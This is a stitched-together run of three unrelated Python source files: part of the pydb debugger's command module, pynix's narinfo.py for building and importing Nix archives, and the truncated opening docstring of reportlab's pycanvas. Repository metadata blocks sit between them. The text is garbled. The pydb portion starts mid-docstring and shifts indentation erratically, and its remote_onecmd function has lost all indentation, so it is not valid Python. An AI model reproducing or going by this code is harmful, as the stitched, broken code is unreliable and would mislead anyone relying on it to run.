
    If the environment variable $PAGER is defined, the file is
    piped through that command.  You'll notice this only for long help
    output.

    Some commands like 'info', 'set', and 'show' can accept an
    additional subcommand to give help just about that particular
    subcommand. For example 'help info line' gives help about the
    \code{info line} command.

    See also 'examine' and 'whatis'.
    """
    # We don't want to repeat the last help command. That makes
    # not much sense and if give help that uses PAGER we may
    # turn a quit CR into rerunning the help command.
    self.lastcmd=''
    if arg:
        first_arg = arg.split()[0]
        try:
            # A dedicated help_xxx routine takes precedence.
            func = getattr(self, 'help_' + first_arg)
            func(arg.split()[1:])
        except AttributeError:
            try:
                # Fall back to the command's docstring.
                doc=getattr(self, 'do_' + first_arg).__doc__
                self.msg("%s\n" % str(doc))
                return
            except AttributeError:
                # If we have an object run site helper on that
                try:
                    if not self.curframe:
                        # ?? Should we have set up a dummy globals
                        # to have persistence?
                        value = eval(arg, None, None)
                    else:
                        value = eval(arg, self.curframe.f_globals,
                                     self.curframe.f_locals)
                    from site import _Helper
                    h=_Helper()
                    h.__call__(value)
                except:
                    self.msg("%s\n" % str(self.nohelp % (first_arg,)))
                    return
        return
    else:
        # No argument: list documented and undocumented commands.
        names = self.get_names()
        cmds_doc = []
        cmds_undoc = []
        help_dict = {}
        for name in names:
            if name[:5] == 'help_':
                help_dict[name[5:]]=1
        names.sort()
        # There can be duplicates if routines overridden
        prevname = ''
        for name in names:
            if name[:3] == 'do_':
                if name == prevname:
                    continue
                prevname = name
                cmd=name[3:]
                if cmd in help_dict:
                    cmds_doc.append(cmd)
                    del help_dict[cmd]
                elif getattr(self, name).__doc__:
                    cmds_doc.append(cmd)
                else:
                    cmds_undoc.append(cmd)
        self.msg("%s\n" % str(self.doc_leader))
        self.print_topics(self.doc_header, cmds_doc, 15,
                          self.width)
        self.print_topics(self.misc_header, help_dict.keys(),15,
                          self.width)
        self.print_topics(self.undoc_header, cmds_undoc, 15,
                          self.width)

# 'h' is a synonym for 'help'.
do_h = do_help
# Can be executed earlier than 'setup' if desired
def execRcLines(self):
    """Some commands were batched in self.rcLines.  Run as many of
    them as we can now.

    To be compatible with onecmd will return 1 if we are to
    continue execution and None if not -- continue debugger
    command loop reading.  The remaining lines will still be in
    self.rcLines."""
    if self.rcLines:
        # Make local copy because of recursion
        rcLines = self.rcLines
        # executed only once
        for line in rcLines:
            self.rcLines = self.rcLines[1:]
            line = line[:-1]  # strip the trailing newline
            if len(line) > 0:
                # Some commands like step, continue,
                # return return 1 to indicate execution
                # should be continued. The return code
                # value is kind of sucky but at present
                # it's too much work to fix all of the
                # places needed. So live with it.
                if self.onecmd(line) == 1:
                    return 1
def get_an_int(self, arg, errmsg=None, min_value=None, max_value=None):
    """Another get_int() routine, this one simpler and less stylized
    than get_int().  We eval arg return it as an integer value or
    None if there was an error in parsing this.

    errmsg -- custom message reported on a parse error.
    min_value/max_value -- inclusive bounds; a violation reports an
    error and returns None.
    """
    ret_value = None
    if arg:
        try:
            # eval() is used so we will allow arithmetic expressions,
            # variables etc.
            ret_value = int(eval(arg))
        except (SyntaxError, NameError, ValueError):
            if errmsg:
                self.errmsg(errmsg)
            else:
                self.errmsg('Expecting an integer, got: %s.' % str(arg))
            return None
    # Only range-check a successfully parsed value; previously a missing
    # arg with bounds set could compare/format None and blow up.
    if ret_value is not None:
        # Compare bounds against None explicitly so a bound of 0 is
        # honored; previously "if min_value" silently ignored 0.
        if min_value is not None and ret_value < min_value:
            self.errmsg('Expecting integer value to be at least %d, got: %d.' %
                        (min_value, ret_value))
            return None
        elif max_value is not None and ret_value > max_value:
            self.errmsg('Expecting integer value to be at most %d, got: %d.' %
                        (max_value, ret_value))
            return None
    return ret_value
def get_int(self, arg, default=1, cmdname=None):
    """If arg is an int, use that otherwise take default.

    Raises ValueError (after reporting an error message) when arg is
    given but does not evaluate to an integer."""
    if arg:
        try:
            # eval() is used so we will allow arithmetic expressions,
            # variables etc.
            default = int(eval(arg))
        except (SyntaxError, NameError, ValueError):
            if cmdname:
                self.errmsg('%s command: Expecting an integer, got: %s.' %
                            (cmdname, str(arg)))
            else:
                self.errmsg('Expecting an integer, got: %s.' % str(arg))
            raise ValueError
    return default
def get_onoff(self, arg, default=None, print_error=True):
    """Return True if arg is 'on' or 1 and False if arg is 'off' or 0.
    Any other value raises ValueError (reported when print_error)."""
    if not arg:
        if default is not None:
            return default
        if print_error:
            self.errmsg("Expecting 'on', 1, 'off', or 0. Got nothing.")
        raise ValueError
    if arg in ('1', 'on'):
        return True
    if arg in ('0', 'off'):
        return False
    if print_error:
        self.errmsg("Expecting 'on', 1, 'off', or 0. Got: %s." % str(arg))
    raise ValueError
def get_pos_int(self, arg, min_value=0, default=1, cmdname=None):
    """If no argument use the default.  If arg is a positive int at
    least min_value, use that otherwise report an error and raise
    ValueError."""
    if arg:
        try:
            # eval() is used so we will allow arithmetic expressions,
            # variables etc.
            default = int(eval(arg))
            if default < min_value:
                if cmdname:
                    self.errmsg(('%s command: Expecting a positive ' +
                                 'integer at least %d, got: %d.')
                                % (cmdname, min_value, default))
                else:
                    self.errmsg(('Expecting a positive ' +
                                 'integer at least %d, got: %d')
                                % (min_value, default))
                # Really should use something custom?
                raise ZeroDivisionError
        except (SyntaxError, NameError, ValueError):
            if cmdname:
                self.errmsg(('%s command: Expecting a positive integer, '
                             + "got: %s") % (cmdname, str(arg)))
            else:
                self.errmsg(('Expecting a positive integer, '
                             + "got: %s") % str(arg))
            raise ValueError
        except ZeroDivisionError:
            # Turn this into a ValueError
            raise ValueError
    return default
def getval(self, arg):
    """Evaluate arg in the current frame's namespaces and return the
    result; on error report it and re-raise."""
    try:
        return eval(arg, self.curframe.f_globals,
                    self.curframe.f_locals)
    except:
        t, v = sys.exc_info()[:2]
        # NOTE(review): t is normally an exception class; the str check
        # covers legacy Python 2 string exceptions.
        if isinstance(t, str):
            exc_type_name = t
        else: exc_type_name = t.__name__
        self.errmsg(str("%s: %s" % (exc_type_name, arg)))
        raise
def errmsg(self, msg, prefix="*** "):
    """Common routine for reporting debugger error messages.
    Derived classed may want to override this to capture output.
    """
    text = "%s%s\n" % (prefix, msg)
    self.msg_nocr(text)
def handle_command_def(self,line):
    """ Handles one command line during command list
    definition.

    Returns 1 when the definition list is complete ('end' seen, or a
    resuming command was added)."""
    cmd, arg, line = self.parseline(line)
    if cmd == 'silent':
        self.commands_silent[self.commands_bnum] = True
        return # continue to handle other cmd def in the cmd list
    elif cmd == 'end':
        self.cmdqueue = []
        return 1 # end of cmd list
    cmdlist = self.commands[self.commands_bnum]
    if (arg):
        cmdlist.append(cmd+' '+arg)
    else:
        cmdlist.append(cmd)
    # Determine if we must stop
    try:
        func = getattr(self, 'do_' + cmd)
    except AttributeError:
        func = self.default
    # func_name is the Python 2 spelling of __name__.
    if func.func_name in self.commands_resuming :
        # one of the resuming commands.
        self.commands_doprompt[self.commands_bnum] = False
        self.cmdqueue = []
        return 1
    return
def msg(self, msg, out=None):
    """Common routine for reporting messages.
    Derived classed may want to override this to capture output.
    """
    text = "%s\n" % msg
    self.msg_nocr(text, out)
def msg_nocr(self, msg, out=None):
    """Common routine for reporting messages (no carriage return).
    Derived classed may want to override this to capture output.

    When logging is enabled the message also goes to the log file
    object; logging_redirect suppresses the normal console copy."""
    do_print = True
    if self.logging:
        if self.logging_fileobj is not None:
            print >> self.logging_fileobj, msg,
            if self.flush: self.logging_fileobj.flush()
        do_print = not self.logging_redirect
    if do_print:
        if out is None:
            out = self.stdout
        print >> out, msg,
        if self.flush: out.flush()
def precmd(self, line):
    """Method executed just before the command line line is
    interpreted, but after the input prompt is generated and
    issued.

    Handle alias expansion and ';;' separator."""
    if not line.strip():
        return line
    args = line.split()
    # Expand aliases repeatedly so an alias may refer to another alias;
    # %1..%n substitute positional arguments and %* the remainder.
    while args[0] in self.aliases:
        line = self.aliases[args[0]]
        ii = 1
        for tmpArg in args[1:]:
            line = line.replace("%" + str(ii),
                                tmpArg)
            ii = ii + 1
        line = line.replace("%*", ' '.join(args[1:]))
        args = line.split()
    # split into ';;' separated commands
    # unless it's an alias command
    if args[0] != 'alias':
        marker = line.find(';;')
        if marker >= 0:
            # queue up everything after marker
            next = line[marker+2:].lstrip()
            self.cmdqueue.append(next)
            line = line[:marker].rstrip()
    return line
    def print_location(self, print_line=False):
        """Show where we are. GUI's and front-end interfaces often
        use this to update displays. So it is helpful to make sure
        we give at least some place that's located in a file.
        Walks outward from the current stack frame, printing
        '(file:line): function' for each frame until a non-exec
        frame (or our own bootstrap frame) is reached.
        """
        i_stack = self.curindex
        while i_stack >= 0:
            frame_lineno = self.stack[i_stack]
            i_stack -= 1
            frame, lineno = frame_lineno
            # Next check to see that local variable breadcrumb exists and
            # has the magic dynamic value.
            # If so, it's us and we don't normally show this.
            if 'breadcrumb' in frame.f_locals:
                if self.run == frame.f_locals['breadcrumb']:
                    break
            filename = self.filename(self.canonic_filename(frame))
            self.msg_nocr('(%s:%s):' % (filename, lineno))
            fn_name = frame.f_code.co_name
            if fn_name and fn_name != '?':
                self.msg(" %s" % frame.f_code.co_name)
            else:
                self.msg("")
            if print_line:
                # '+ ' marks the source line, mirroring debugger output.
                self.msg_nocr('+ ')
                line=linecache.getline(filename, lineno)
                if line and len(line.strip()) != 0:
                    self.print_source_line(lineno, line)
            # If we are stopped at an "exec" statement, also print the next
            # outer location so front-ends can track source execution.
            if not is_exec_stmt(frame):
                break
    def onecmd(self, line):
        """Interpret the argument as though it had been typed
        in response to the prompt.
        Checks whether this line is typed in the normal
        prompt or in a breakpoint command list definition """
        if not self.commands_defining:
            # Normal interactive command: optionally echo it, then let
            # cmd.Cmd dispatch to the matching do_* method.
            if self.cmdtrace: self.msg("+%s" % line)
            return cmd.Cmd.onecmd(self, line)
        else:
            # Inside a breakpoint 'commands' block: record the line in
            # the command list instead of executing it.
            return self.handle_command_def(line)
    def undefined_cmd(self, cmd, subcmd):
        """Error message when subcommand asked for but doesn't exist.
        NOTE(review): the 'cmd' parameter shadows the imported cmd
        module within this method; harmless here, but confusing.
        """
        self.errmsg("Undefined %s command \"%s\"." % (cmd, subcmd))
    #### From SoC project. Look over.
    def _disconnect(self):
        """ Disconnect a connection.
        Tears down the remote-debugging connection (if any), restores
        the original stdin/stdout streams and the local prompt, and
        switches command dispatch back to plain local handling.
        """
        if self.connection:
            self.connection.disconnect()
            # Restore the standard streams swapped out while remote.
            self._rebind_output(self.orig_stdout)
            self._rebind_input(self.orig_stdin)
            self.connection = None
        if hasattr(self, 'local_prompt') and self.local_prompt is not None:
            # Restore the prompt we had before going remote.
            self.prompt = self.local_prompt
            self.local_prompt = None
        # Route future commands through the ordinary local onecmd.
        self.onecmd = lambda x: pydb.Pdb.onecmd(self, x)
        self.target = 'local'
    def _rebind_input(self, new_input):
        """Point the debugger's input stream at new_input."""
        self.stdin = new_input
    def _rebind_output(self, new_output):
        """Point the debugger's output stream at new_output, flushing
        any pending output on the old stream first."""
        self.stdout.flush()
        self.stdout = new_output
        if not hasattr(self.stdout, 'flush'):
            # Some file-like objects have no flush(); give them a no-op
            # so the rest of the code can call flush() unconditionally.
            self.stdout.flush = lambda: None
def remote_onecmd(self, line):
""" All commands in 'line' are sent across this object's connection
instance variable.
"""
if not line:
# Execute the previous command
line = self.lastcmd
# This is the simplest way I could think of to do this without
# breaking any of the inherited code from pydb/pdb. If we're a
# remote client, always call 'rquit' (remote quit) when connected to
# a pdbserver. This executes extra code to allow the client and server
# to quit cleanly.
if 'quit'.startswith(line):
line = 'rquit'
self.connection.write(line)
# Reset the onecmd method
self.onecmd = pydb.Pdb.onecmd
self.do_rquit(None)
return
if 'detach'.startswith(line):
self.connection.write('rdetach')
self.do_detach(None)
self.connection.write(line)
ret = self.connection.readline()
if ret == '':
self.errmsg('Connection closed unexpectedly')
self.onecmd = lambda x: pydb.Pdb.onecmd(self, x)
self.do_rquit(None)
# The output from the command that we've just sent to the server
# is returned along with the prompt of that server. So we keep reading
# until we find our prompt.
i = 1
while ret.find('(Pydb)') != -1:
if i == 100:
# We're probably _never_ going to get that data and that
# connection is probably dead.
self.errmsg('Connection died unexpectedly')
self.onecmd = pydb.Pdb.onecmd
self.do_rquit(None)
else:
ret += self.connection.readline()
i += 1
# Some 'special' actions must be taken depending on the data returned
if 'restart_now' in ret:
self.connection.write('ACK:restart_now')
self.errmsg('Pdbserver restarting..')
# We've acknowledged a restart, which means that a new pdbserver
# process is started, so we have to connect all over again.
self._disconnect()
import time
time.sleep(3.0)
if not self.do_target(self.target_addr):
# We cannot trust these variables below to be in a
# stable state. i.e. if the pdbserver doesn't come back up.
self.onecmd = lambda x: pydb.Pdb.onecmd(self, x)
return
self.msg_nocr(ret)
self.lastcmd = line
return
| {
"repo_name": "carlgao/lenga",
"path": "images/lenny64-peon/usr/share/python-support/pydb/pydb/pydbcmd.py",
"copies": "1",
"size": "22247",
"license": "mit",
"hash": -2782236886588068000,
"line_mean": 39.0846846847,
"line_max": 133,
"alpha_frac": 0.5266328044,
"autogenerated": false,
"ratio": 4.429908403026682,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 1,
"avg_score": 0.0052778157085397485,
"num_lines": 555
} |
"""A python embedding of a NarInfo object."""
import base64
import sys
if sys.version_info >= (3, 0):
from functools import lru_cache
import lzma
from io import BytesIO
else:
from repoze.lru import lru_cache
from backports import lzma
from StringIO import StringIO as BytesIO
import logging
import os
from os.path import join, basename, dirname
import yaml
from subprocess import check_output, Popen, PIPE
import gzip
import bz2
from pynix.derivation import Derivation
from pynix.utils import (decode_str, strip_output, nix_cmd, query_store,
is_path_in_store)
from pynix.exceptions import NoNarGenerated, NixImportFailed
# Magic 8-byte number that comes at the beginning of the export's bytes.
EXPORT_INITIAL_MAGIC = b"\x01" + (b"\x00" * 7)
# Magic 8-byte number that comes after the NAR, before export metadata.
EXPORT_METADATA_MAGIC = b"NIXE\x00\x00\x00\x00"
# A bytestring of 8 zeros, used below.
# BUGFIX: was ``bytes(8)``, which under Python 2 (supported by this
# module) yields the one-character string '8', not eight NUL bytes.
EIGHT_ZEROS = b"\x00" * 8
# Compression types which are allowed for NARs.
COMPRESSION_TYPES = ("xz", "bzip2")
# Accepted aliases mapped onto their canonical compression type.
COMPRESSION_TYPE_ALIASES = {"xzip": "xz", "bz2": "bzip2"}
def resolve_compression_type(compression_type):
    """Normalize a compression type string to its canonical form.

    Aliases (e.g. "xzip", "bz2") are mapped to their canonical names;
    canonical names pass through unchanged.

    :raises: ``ValueError`` if the compression type is invalid.
    """
    canonical = COMPRESSION_TYPE_ALIASES.get(compression_type, compression_type)
    if canonical not in COMPRESSION_TYPES:
        raise ValueError("Invalid compression type: {}"
                         .format(compression_type))
    return canonical
class NarInfo(object):
    """Metadata describing a nix archive (NAR) of a store path.

    Mirrors the ``.narinfo`` file format served by nix binary caches.
    """
    # Cache of narinfo's that have been parsed, to avoid duplicate work.
    NARINFO_CACHE = {"xz": {}, "bzip2": {}}
    # Cache mapping store objects to their compressed NAR paths.
    NAR_PATH_CACHE = {"xz": {}, "bzip2": {}}
    def __init__(self, store_path, url, compression,
                 nar_size, nar_hash, file_size, file_hash,
                 references, deriver, signature):
        """Initializer.
        :param url: The URL at which this NAR can be fetched.
        :type url: ``str``
        :param store_path: The nix store path the NAR compresses.
        :type store_path: ``str``
        :param compression: How the nix store path has been compressed.
        :type compression: ``str``
        :param nar_size: The size of the nix archive, in bytes.
        :type nar_size: ``int``
        :param nar_hash: The hash of the nix archive, in <type>:<hash> format.
        :type nar_hash: ``str``
        :param file_size: The size of the archived nix store object, in bytes.
        :type file_size: ``int``
        :param file_hash: The hash of the store object in <type>:<hash> format.
        :type file_hash: ``str``
        :param references: A list of the base paths of other store
                           paths the object references.
        :type references: ``list`` of ``str``
        :param deriver: Path to the derivation used to build path (optional).
        :type deriver: ``str`` or ``NoneType``
        :param signature: Signature guaranteeing correctness (optional).
        :type signature: ``str`` or ``NoneType``
        :raises: ``ValueError`` if nar_hash is not base32-encoded sha256.
        """
        # We require a particular nar_hash: sha256 in base-32
        # ("sha256:" prefix of 7 chars + 52-char digest = 59).
        if not nar_hash.startswith("sha256:"):
            raise ValueError("NAR hash must be sha256.")
        elif len(nar_hash) != 59:
            raise ValueError("Hash must be encoded in base-32 (length 59)")
        self.url = url
        self.store_path = store_path
        self.compression = compression
        self.nar_size = nar_size
        self.nar_hash = nar_hash
        self.file_size = file_size
        self.file_hash = file_hash
        # References and deriver are stored as sorted basenames only.
        self.references = list(sorted(basename(r) for r in references))
        self.deriver = basename(deriver) if deriver else None
        self.signature = signature
    def __repr__(self):
        return "NarInfo({})".format(self.store_path)
    def __str__(self):
        args = ",".join("{}={}".format(k, repr(v))
                        for k, v in vars(self).items())
        return "NarInfo({})".format(args)
    def to_dict(self):
        """Generate a dictionary representation."""
        result = {
            "URL": self.url,
            "StorePath": self.store_path,
            "Compression": self.compression,
            "NarHash": self.nar_hash,
            "NarSize": self.nar_size,
            "FileSize": self.file_size,
            "FileHash": self.file_hash,
            "References": self.references,
        }
        # Optional fields are omitted entirely when unset.
        if self.deriver is not None:
            result["Deriver"] = self.deriver
        if self.signature is not None:
            result["Sig"] = self.signature
        return result
    def to_string(self):
        """Generate a string representation (the .narinfo file format)."""
        as_dict = self.to_dict()
        as_dict["References"] = " ".join(as_dict["References"])
        return "\n".join("{}: {}".format(k, v) for k, v in as_dict.items())
    def abspath_of(self, path):
        """Join a path with the nix store path to make it absolute.
        :param path: A path in the nix store.
        :type path: ``str``
        :return: The absolute path of that path, in the nix store.
        :rtype: ``str``
        """
        store_dir = os.path.dirname(self.store_path)
        return os.path.join(store_dir, path)
    @property
    def abs_references(self):
        """Return absolute paths of references.
        :return: A list of store paths.
        :rtype: ``list`` of ``str``
        """
        return [self.abspath_of(r) for r in self.references]
    @property
    def abs_deriver(self):
        """Return the absolute path of the deriver, if it is set.
        :return: A store path or None.
        :rtype: ``str`` or ``NoneType``
        """
        if self.deriver is not None:
            return self.abspath_of(self.deriver)
        else:
            return None
    def nar_to_export(self, nar_bytes):
        """Use the narinfo metadata to convert a nar bytestring to an export.
        :param nar_bytes: Raw bytes of a nix archive.
        :type nar_bytes: ``bytes``
        :return: A nar export.
        :rtype: :py:class:`NarExport`
        """
        return NarExport(self.store_path, nar_bytes=nar_bytes,
                         references=self.abs_references,
                         deriver=self.abs_deriver, signature=self.signature)
    def import_to_store(self, compressed_nar):
        """Given a compressed NAR, extract it and import it into the nix store.
        :param compressed_nar: The bytes of a NAR, compressed.
        :type compressed_nar: ``str``
        :return: The path imported into the store.
        """
        # Figure out how to extract the content.
        # NOTE(review): any compression string other than xz/bzip2
        # variants silently falls through to gzip -- confirm that gzip
        # really is the intended default rather than an error.
        if self.compression.lower() in ("xz", "xzip"):
            data = lzma.decompress(compressed_nar)
        elif self.compression.lower() in ("bz2", "bzip2"):
            data = bz2.decompress(compressed_nar)
        else:
            data = gzip.decompress(compressed_nar)
        # Once extracted, convert it into a nix export object and import.
        export = self.nar_to_export(data)
        imported_path = export.import_to_store()
        return imported_path
    @classmethod
    def from_dict(cls, dictionary):
        """Given a dictionary representation, convert it to a NarInfo.
        :param dictionary: Dictionary representation, in the form
                           given by `self.to_dict()`, except that keys
                           are case insensitive.
        :type dictionary: ``dict``
        :return: A ``NarInfo`` object.
        :rtype: :py:class:`NarInfo`
        """
        # Convert keys to lower case
        dictionary = {k.lower(): v for k, v in dictionary.items()}
        url = dictionary["url"]
        store_path = dictionary["storepath"]
        compression = dictionary["compression"]
        nar_size = int(dictionary["narsize"])
        nar_hash = dictionary["narhash"]
        file_size = int(dictionary["filesize"])
        file_hash = dictionary["filehash"]
        references = dictionary.get("references") or []
        # References may be a single space-separated string.
        if isinstance(references, str):
            references = references.split()
        deriver = dictionary.get("deriver") or None
        signature = dictionary.get("sig")
        return cls(url=url, store_path=store_path, compression=compression,
                   nar_size=nar_size, nar_hash=nar_hash, file_size=file_size,
                   file_hash=file_hash, references=references, deriver=deriver,
                   signature=signature)
    @classmethod
    def from_string(cls, string):
        """Parse a string into a NarInfo.
        The narinfo format is plain ``Key: value`` lines, which YAML
        parses into a dict.  SECURITY FIX: use the safe loader, since
        narinfo text may come from an untrusted binary cache and plain
        ``yaml.load`` can construct arbitrary Python objects.
        """
        return cls.from_dict(yaml.safe_load(string))
    @staticmethod
    def _nar_expr(store_path, compression_type):
        """Return the nix expression that builds a NAR for ``store_path``.
        Shared by :py:meth:`build_nar` and :py:meth:`get_nar_dir`.
        """
        return "".join([
            "(import <nix/nar.nix> {",
            'storePath = "{}";'.format(store_path),
            'hashAlgo = "sha256";',
            'compressionType = "{}";'.format(compression_type),
            "})"])
    @classmethod
    def build_nar(cls, store_path, compression_type="xz", quiet=False):
        """Build a nix archive (nar) and return the resulting path."""
        if compression_type not in cls.NAR_PATH_CACHE:
            raise ValueError("Unsupported compression type: {}"
                             .format(compression_type))
        if store_path in cls.NAR_PATH_CACHE[compression_type]:
            return cls.NAR_PATH_CACHE[compression_type][store_path]
        logging.info("Kicking off NAR build of {}, {} compression"
                     .format(basename(store_path), compression_type))
        # Construct a nix expression which will produce a nar.
        nar_expr = cls._nar_expr(store_path, compression_type)
        # Nix-build this expression, resulting in a store object.
        nar_dir = strip_output(
            nix_cmd("nix-build", ["--expr", nar_expr, "--no-out-link"]),
            hide_stderr=quiet)
        return cls.register_nar_path(nar_dir, store_path, compression_type)
    @classmethod
    def register_nar_path(cls, nar_dir, store_path, compression_type):
        """After a NAR has been built, this adds the path to the cache."""
        # There should be a file with this extension in the directory.
        extension = ".nar." + ("bz2" if compression_type == "bzip2" else "xz")
        contents = map(decode_str, os.listdir(nar_dir))
        for filename in contents:
            if filename.endswith(extension):
                nar_path = join(nar_dir, filename)
                cls.NAR_PATH_CACHE[compression_type][store_path] = nar_path
                return nar_path
        # This might happen if we run out of disk space or something
        # else terrible.
        raise NoNarGenerated(nar_dir, extension)
    @classmethod
    @lru_cache(1024)
    def get_nar_dir(cls, store_path, compression_type):
        """Get the directory of a nix archive without building it."""
        if compression_type not in ("xz", "bzip2"):
            raise ValueError("Unsupported compression type: {}"
                             .format(compression_type))
        # Construct a nix expression which will produce a nar.
        nar_expr = cls._nar_expr(store_path, compression_type)
        # Instantiate (but do not build) the expression, then read the
        # output path from the resulting derivation.
        derivation_path = strip_output(
            nix_cmd("nix-instantiate", ["--expr", nar_expr, "--no-gc-warning"]))
        derivation = Derivation.parse_derivation_file(derivation_path)
        return derivation.outputs["out"]
    @classmethod
    def from_store_path(cls, store_path, compression_type="xz"):
        """Load a narinfo from a store path.
        :param store_path: Path in the nix store to load info on.
        :type store_path: ``str``
        :param compression_type: What type of compression to use on the NAR.
        :return: A NarInfo for the path.
        :rtype: :py:class:`NarInfo`
        """
        if store_path in cls.NARINFO_CACHE[compression_type]:
            return cls.NARINFO_CACHE[compression_type][store_path]
        # Build the compressed version. Compute its hash and size.
        nar_path = cls.build_nar(store_path, compression_type=compression_type)
        du = strip_output("du -sb {}".format(nar_path))
        file_size = int(du.split()[0])
        file_hash = strip_output(nix_cmd("nix-hash", ["--type", "sha256",
                                         "--base32", "--flat", nar_path]))
        nar_size = query_store(store_path, "--size")
        nar_hash = query_store(store_path, "--hash")
        references = query_store(store_path, "--references").split()
        deriver = query_store(store_path, "--deriver")
        extension = ".nar." + ("bz2" if compression_type == "bzip2" else "xz")
        narinfo = cls(
            url="nar/{}{}".format(basename(store_path)[:32], extension),
            compression=compression_type,
            store_path=store_path,
            nar_hash=nar_hash,
            nar_size=nar_size,
            # NOTE(review): file_size is passed as str here although the
            # initializer documents int -- rendered output is identical,
            # but confirm no caller relies on the type before changing.
            file_size=str(file_size),
            file_hash="sha256:{}".format(file_hash),
            references=references,
            deriver=None if deriver == "unknown-deriver" else deriver,
            signature=None
        )
        cls.NARINFO_CACHE[compression_type][store_path] = narinfo
        return narinfo
class NarExport(object):
    """A nix archive augmented with some metadata.
    A nix export is a nix archive coupled with some metadata, created
    with the `nix-store --export` command. Specifically, it adds
    information about references and optionally a deriver path.
    """
    def __init__(self, store_path, nar_bytes, references, deriver, signature):
        """Initializer.
        :param store_path: Path to the object being encoded.
        :type store_path: ``str``
        :param nar_bytes: The bytes of a nix archive.
        :type nar_bytes: ``bytes``
        :param references: A list of paths that the object refers
                           to. These should be absolute paths.
        :type references: ``list`` of ``str``
        :param deriver: The absolute path to the derivation that
                        built the object. Optional.
        :type deriver: ``str`` or ``NoneType``
        :param signature: Signature of the binary cache. Optional, but
                          might be required depending on the nix settings.
        :type signature: ``str`` or ``NoneType``
        :raises: ``ValueError`` if any supplied path is not absolute.
        """
        self.store_path = store_path
        self.nar_bytes = nar_bytes
        self.references = references
        self.deriver = deriver
        self.signature = signature
        # Validate up front that every path we will serialize is absolute.
        _paths = [store_path] + references
        if deriver is not None:
            _paths.append(deriver)
        for path in _paths:
            if not os.path.isabs(path):
                raise ValueError("Paths must be absolute ({}).".format(path))
    def import_to_store(self):
        """Import this NarExport into the local nix store.
        Pipes the serialized export into ``nix-store --import``.
        :return: The imported store path (stdout of nix-store).
        :raises: :py:class:`NixImportFailed` if nix-store exits nonzero.
        """
        proc = Popen(nix_cmd("nix-store", ["--import", "-vvvvv"]),
                     stdin=PIPE, stdout=PIPE, stderr=PIPE)
        out, err = proc.communicate(input=self.to_bytes())
        if proc.returncode == 0:
            return decode_str(out)
        else:
            raise NixImportFailed(err, store_path=self.store_path)
    def to_bytes(self):
        """Convert a nar export into bytes.
        Nix exports are a binary format. The input to this function is
        a bytestring intended to have been created from a call to
        `nix-store --dump`, or equivalently, as returned by a nix
        binary cache. The logic of this function adds a few things:
        * An 8-byte magic header, which nix-store reads when it imports.
        * The bytes of the NAR itself.
        * Another magic bytestring, which is 'NIXE' followed by four nulls.
        * The path to the object in the nix store being imported.
        * The number of references.
        * The path of each reference.
        * The deriver path, if known (else an empty string).
        * 8 empty bytes, to indicate we're not including a signature.
        * 8 empty bytes, for reasons unknown to me but needed by nix-store.
        Each string referenced above (e.g. paths) is represented by
        first writing its length as an integer encoded in
        little-endian 8 bytes, then the string itself, and then as
        many null bytes as are needed to get to the nearest multiple
        of 8 bytes. So for example, the string "hello" would be
        represented as
          "\x05\x00\x00\x00\x00\x00\x00\x00hello\x00\x00\x00"
        Note that there are three zeros following the "hello" text, in
        order to pad it to eight bytes.
        """
        def addstr(bytesio, bstring):
            """Utility function, adds a string with padding to the bytes."""
            _len = len(bstring)
            # 8-byte little-endian length prefix ...
            bytesio.write(_len.to_bytes(8, "little"))
            bytesio.write(bstring)
            # ... then NUL-pad the payload up to a multiple of 8 bytes.
            if _len % 8 != 0:
                bytesio.write(EIGHT_ZEROS[:8 - (_len % 8)])
        # Start with the magic header and nar bytes.
        bio = BytesIO()
        bio.write(EXPORT_INITIAL_MAGIC)
        bio.write(self.nar_bytes)
        # Write the magic value for the metadata.
        bio.write(EXPORT_METADATA_MAGIC)
        # Write the store path of the object.
        addstr(bio, self.store_path.encode("utf-8"))
        # Write the number of references, and each reference.
        bio.write(len(self.references).to_bytes(8, "little"))
        for ref in self.references:
            addstr(bio, ref.encode("utf-8"))
        # Deriver slot is always present; empty string means unknown.
        if self.deriver is not None:
            addstr(bio, self.deriver.encode("utf-8"))
        else:
            addstr(bio, b"")
        if self.signature is not None:
            # First write a '1' to tell nix that we have a signature.
            bio.write((1).to_bytes(8, "little"))
            # Then write the signature.
            addstr(bio, self.signature.encode("utf-8"))
        else:
            # Write a zero here so that nix doesn't look for a signature.
            bio.write(EIGHT_ZEROS)
        # Write a final zero to indicate the end of the export.
        bio.write(EIGHT_ZEROS)
        # Return the contents of the bytesio as the resulting bytestring.
        return bio.getvalue()
| {
"repo_name": "NarrativeScience/pynix",
"path": "src/pynix/narinfo.py",
"copies": "1",
"size": "18302",
"license": "mit",
"hash": 4220987715986397700,
"line_mean": 38.8736383442,
"line_max": 80,
"alpha_frac": 0.5947437439,
"autogenerated": false,
"ratio": 3.915703893881044,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.5010447637781044,
"avg_score": null,
"num_lines": null
} |
__doc__ = """pycanvas.Canvas : a Canvas class which can also output Python source code.
pycanvas.Canvas class works exactly like canvas.Canvas, but you can
call str() on pycanvas.Canvas instances. Doing so will return the
Python source code equivalent to your own program, which would, when
run, produce the same PDF document as your original program.
Generated Python source code defines a doIt() function which accepts
a filename or file-like object as its first parameter, and an
optional boolean parameter named "regenerate".
The doIt() function will generate a PDF document and save it in the
file you specified in this argument. If the regenerate parameter is
set then it will also return an automatically generated equivalent
Python source code as a string of text, which you can run again to
produce the very same PDF document and the Python source code, which
you can run again... ad nauseam ! If the regenerate parameter is
unset or not used at all (it then defaults to being unset) then None
is returned and the doIt() function is much much faster, it is also
much faster than the original non-serialized program.
the reportlab/test/test_pdfgen_pycanvas.py program is the test suite
for pycanvas, you can do the following to run it :
First set verbose=1 in reportlab/rl_config.py
then from the command interpreter :
$ cd reportlab/test
$ python test_pdfgen_pycanvas.py >n1.py
this will produce both n1.py and test_pdfgen_pycanvas.pdf
then :
$ python n1.py n1.pdf >n2.py
$ python n2.py n2.pdf >n3.py
$ ...
n1.py, n2.py, n3.py and so on will be identical files.
they eventually may end being a bit different because of
rounding problems, mostly in the comments, but this
doesn't matter since the values really are the same
(e.g. 0 instead of 0.0, or .53 instead of 0.53)
n1.pdf, n2.pdf, n3.pdf and so on will be PDF files
similar to test_pdfgen_pycanvas.pdf.
Alternatively you can import n1.py (or n3.py, or n16384.py if you prefer)
in your own program, and then call its doIt function :
import n1
pythonsource = n1.doIt("myfile.pdf", regenerate=1)
Or if you don't need the python source code and want a faster result :
import n1
n1.doIt("myfile.pdf")
When the generated source code is run directly as an independent program,
then the equivalent python source code is printed to stdout, e.g. :
python n1.py
